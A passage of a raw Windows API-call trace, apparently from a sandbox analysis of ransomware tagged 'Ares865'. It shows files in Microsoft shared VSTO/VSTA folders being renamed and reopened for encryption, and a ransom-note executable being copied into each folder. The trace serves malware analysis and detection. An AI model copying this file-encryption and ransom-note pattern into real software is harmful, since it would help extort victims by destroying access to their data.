returned="vstoee100.tlb" [0148.249] lstrlenW (lpString="vstoee100.tlb") returned 13 [0148.249] lstrlenW (lpString="Ares865") returned 7 [0148.249] lstrcmpiW (lpString1="100.tlb", lpString2="Ares865") returned -1 [0148.249] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\vstoee100.tlb.Ares865") returned 79 [0148.249] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\vstoee100.tlb" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsto\\vstoee100.tlb"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\vstoee100.tlb.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsto\\vstoee100.tlb.ares865"), dwFlags=0x1) returned 1 [0148.251] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\vstoee100.tlb.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsto\\vstoee100.tlb.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0148.252] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=15696) returned 1 [0148.252] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0148.252] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0148.252] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0160 [0148.255] lstrcpyW (in: lpString1=0x2cce474, lpString2="vstoee90.tlb" | out: lpString1="vstoee90.tlb") returned="vstoee90.tlb" [0148.255] lstrlenW (lpString="vstoee90.tlb") returned 12 [0148.256] lstrlenW (lpString="Ares865") returned 7 [0148.256] lstrcmpiW (lpString1="e90.tlb", lpString2="Ares865") returned 1 [0148.256] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\vstoee90.tlb.Ares865") returned 78 [0148.256] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\vstoee90.tlb" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsto\\vstoee90.tlb"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\vstoee90.tlb.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsto\\vstoee90.tlb.ares865"), dwFlags=0x1) returned 1 [0148.260] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\vstoee90.tlb.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsto\\vstoee90.tlb.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0148.260] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=20816) returned 1 [0148.260] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0148.260] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0148.260] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0160 [0148.265] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0" [0148.265] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f02f8 | out: hHeap=0x2b0000) returned 1 [0148.265] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ca8 | out: hHeap=0x2b0000) returned 1 [0148.265] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0") returned 62 [0148.265] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0" | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0" [0148.265] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0148.265] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsto\\10.0\\how to back your files.exe"), bFailIfExists=1) returned 0 [0148.266] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0148.266] GetLastError () returned 0x0 [0148.266] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0148.266] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0148.266] CloseHandle (hObject=0x120) returned 1 [0148.266] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0148.266] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0148.266] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x274de510, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x53557d80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53557d80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0148.267] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0148.267] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0148.267] lstrcpyW (in: lpString1=0x2cce47e, lpString2="1033" | out: lpString1="1033") returned="1033" [0148.267] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7ca8 [0148.267] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x88) returned 0x2e95b0 [0148.267] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7cb0 | out: ListHead=0x2e7710, ListEntry=0x2e7cb0) returned 0x2e7bd0 [0148.267] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53557d80, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x53557d80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0148.267] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0148.267] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1336200, ftCreationTime.dwHighDateTime=0x1cab7c7, ftLastAccessTime.dwLowDateTime=0x274de510, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1336200, ftLastWriteTime.dwHighDateTime=0x1cab7c7, nFileSizeHigh=0x0, nFileSizeLow=0x2cc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VSTOInstaller.config", cAlternateFileName="VSTOIN~1.CON")) returned 1 [0148.267] lstrcmpiW (lpString1="VSTOInstaller.config", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0148.267] lstrcmpiW (lpString1="VSTOInstaller.config", lpString2="aoldtz.exe") returned 1 [0148.267] lstrcpyW (in: lpString1=0x2cce47e, lpString2="VSTOInstaller.config" | out: lpString1="VSTOInstaller.config") returned="VSTOInstaller.config" [0148.267] lstrlenW (lpString="VSTOInstaller.config") returned 20 [0148.267] lstrlenW (lpString="Ares865") returned 7 [0148.267] lstrcmpiW (lpString1=".config", lpString2="Ares865") returned -1 [0148.268] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOInstaller.config.Ares865") returned 91 [0148.268] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOInstaller.config" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsto\\10.0\\vstoinstaller.config"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOInstaller.config.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsto\\10.0\\vstoinstaller.config.ares865"), dwFlags=0x1) returned 1 [0148.269] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOInstaller.config.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsto\\10.0\\vstoinstaller.config.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0148.269] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=716) returned 1 [0148.269] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0148.270] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0148.270] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f02f8 [0148.273] lstrcpyW (in: lpString1=0x2cce47e, lpString2="VSTOInstaller.exe" | out: lpString1="VSTOInstaller.exe") returned="VSTOInstaller.exe" [0148.273] lstrlenW (lpString="VSTOInstaller.exe") returned 17 [0148.273] lstrlenW (lpString="Ares865") returned 7 [0148.273] lstrcmpiW (lpString1="ler.exe", lpString2="Ares865") returned 1 [0148.273] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOInstaller.exe.Ares865") returned 88 [0148.273] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOInstaller.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsto\\10.0\\vstoinstaller.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOInstaller.exe.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsto\\10.0\\vstoinstaller.exe.ares865"), dwFlags=0x1) returned 1 [0148.275] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOInstaller.exe.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsto\\10.0\\vstoinstaller.exe.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0148.275] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=87384) returned 1 [0148.276] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0148.276] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0148.276] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f02f8 [0148.283] lstrcpyW (in: lpString1=0x2cce47e, lpString2="VSTOLoader.dll" | out: lpString1="VSTOLoader.dll") returned="VSTOLoader.dll" [0148.283] lstrlenW (lpString="VSTOLoader.dll") returned 14 [0148.283] lstrlenW (lpString="Ares865") returned 7 [0148.283] lstrcmpiW (lpString1="der.dll", lpString2="Ares865") returned 1 [0148.283] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOLoader.dll.Ares865") returned 85 [0148.283] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOLoader.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsto\\10.0\\vstoloader.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOLoader.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsto\\10.0\\vstoloader.dll.ares865"), dwFlags=0x1) returned 1 [0148.286] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOLoader.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsto\\10.0\\vstoloader.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0148.286] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=265552) returned 1 [0148.286] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0148.286] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0148.286] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f02f8 [0148.303] lstrcpyW (in: lpString1=0x2cce47e, lpString2="VSTOMessageProvider.dll" | out: lpString1="VSTOMessageProvider.dll") returned="VSTOMessageProvider.dll" [0148.303] lstrlenW (lpString="VSTOMessageProvider.dll") returned 23 [0148.303] lstrlenW (lpString="Ares865") returned 7 [0148.303] lstrcmpiW (lpString1="der.dll", lpString2="Ares865") returned 1 [0148.303] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOMessageProvider.dll.Ares865") returned 94 [0148.303] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOMessageProvider.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsto\\10.0\\vstomessageprovider.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOMessageProvider.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsto\\10.0\\vstomessageprovider.dll.ares865"), dwFlags=0x1) returned 1 [0148.305] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOMessageProvider.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsto\\10.0\\vstomessageprovider.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0148.305] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=49000) returned 1 [0148.305] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0148.305] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0148.305] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f02f8 [0148.313] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0\\1033", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0\\1033") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0\\1033" [0148.313] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e95b0 | out: hHeap=0x2b0000) returned 1 [0148.313] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ca8 | out: hHeap=0x2b0000) returned 1 [0148.313] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0\\1033") returned 67 [0148.313] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0\\1033" | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0\\1033") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0\\1033" [0148.313] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0148.313] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsto\\10.0\\1033\\how to back your files.exe"), bFailIfExists=1) returned 0 [0148.314] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0148.314] GetLastError () returned 0x0 [0148.314] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0148.314] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0148.314] CloseHandle (hObject=0x120) returned 1 [0148.314] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0148.314] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0148.314] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5279f530, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5357dee0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5357dee0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0148.315] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0148.315] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0148.315] lstrcpyW (in: lpString1=0x2cce488, lpString2="VSTOInstallerUI.dll" | out: lpString1="VSTOInstallerUI.dll") returned="VSTOInstallerUI.dll" [0148.315] lstrlenW (lpString="VSTOInstallerUI.dll") returned 19 [0148.315] lstrlenW (lpString="Ares865") returned 7 [0148.315] lstrcmpiW (lpString1="rUI.dll", lpString2="Ares865") returned 1 [0148.315] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\VSTOInstallerUI.dll.Ares865") returned 95 [0148.315] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\VSTOInstallerUI.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsto\\10.0\\1033\\vstoinstallerui.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\VSTOInstallerUI.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsto\\10.0\\1033\\vstoinstallerui.dll.ares865"), dwFlags=0x1) returned 1 [0148.317] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\VSTOInstallerUI.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsto\\10.0\\1033\\vstoinstallerui.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0148.318] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=10080) returned 1 [0148.318] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0148.318] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0148.318] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f02f8 [0148.321] lstrcpyW (in: lpString1=0x2cce488, lpString2="VSTOLoaderUI.dll" | out: lpString1="VSTOLoaderUI.dll") returned="VSTOLoaderUI.dll" [0148.321] lstrlenW (lpString="VSTOLoaderUI.dll") returned 16 [0148.321] lstrlenW (lpString="Ares865") returned 7 [0148.321] lstrcmpiW (lpString1="rUI.dll", lpString2="Ares865") returned 1 [0148.321] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\VSTOLoaderUI.dll.Ares865") returned 92 [0148.321] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\VSTOLoaderUI.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsto\\10.0\\1033\\vstoloaderui.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\VSTOLoaderUI.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsto\\10.0\\1033\\vstoloaderui.dll.ares865"), dwFlags=0x1) returned 1 [0148.323] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\VSTOLoaderUI.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsto\\10.0\\1033\\vstoloaderui.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0148.324] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=18264) returned 1 [0148.324] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0148.324] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0148.324] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f02f8 [0148.328] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA" [0148.328] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1a88 | out: hHeap=0x2b0000) returned 1 [0148.328] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7bc8 | out: hHeap=0x2b0000) returned 1 [0148.328] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA") returned 57 [0148.328] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA" | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA" [0148.328] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0148.328] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\how to back your files.exe"), bFailIfExists=1) returned 0 [0148.329] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0148.329] GetLastError () returned 0x0 [0148.329] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0148.329] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0148.329] CloseHandle (hObject=0x120) returned 1 [0148.329] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0148.329] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0148.329] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1f4696f0, ftCreationTime.dwHighDateTime=0x1d2dda2, ftLastAccessTime.dwLowDateTime=0x5357dee0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5357dee0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0148.330] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0148.330] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0148.330] lstrcpyW (in: lpString1=0x2cce474, lpString2="8.0" | out: lpString1="8.0") returned="8.0" [0148.330] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7bc8 [0148.330] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x7c) returned 0x2f02f8 [0148.330] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7bd0 | out: ListHead=0x2e7710, ListEntry=0x2e7bd0) returned 0x2e7b70 [0148.330] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x594863b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x535ca1a0, 